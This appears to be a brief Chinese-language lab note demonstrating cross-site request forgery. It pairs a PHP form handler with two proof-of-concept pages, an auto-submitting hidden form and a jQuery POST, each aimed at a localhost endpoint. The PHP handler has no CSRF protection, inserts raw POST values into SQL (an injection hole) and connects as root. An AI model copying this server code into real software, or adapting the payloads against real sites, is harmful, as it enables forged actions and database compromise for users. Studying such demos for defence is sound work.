服务端
1 <?php 2 $conn=mysqli_connect('localhost','root','root','csrf'); 3 $data=$_POST; 4 $user=$_POST['username']; 5 $pass=$_POST['password']; 6 if(!empty($data)){ 7 mysqli_query($conn,"insert into user(`username`,`password`)values('$user','$pass')"); 8 } 9 10 11 12 ?> 13 14 <form action="" method="POST"> 15 1<input type="text" name="username"/> 16 2<input type="text" name="password"/> 17 <button>提交</button> 18 </form>
POC
<form action="http://localhost/csrf/csrf.php" method="POST" id="testfrom"> <input type="hidden" name="username"/> <input type="hidden" name="password"/> </form> <script> var f=document.getElementById("testfrom"); f.getElementsByTagName("input")[0].value="csrf12"; f.getElementsByTagName("input")[1].value="csrf23"; f.submit(); </script>
jQuery POST CSRF
<script src="https://apps.bdimg.com/libs/jquery/2.1.4/jquery.min.js"> </script> <script> $(document).ready(function(){ $.post("http://localhost/csrf/csrf.php",{ username:'test123123', password:'csrf666' }, function(data,status){ alert(status) } ) }); </script>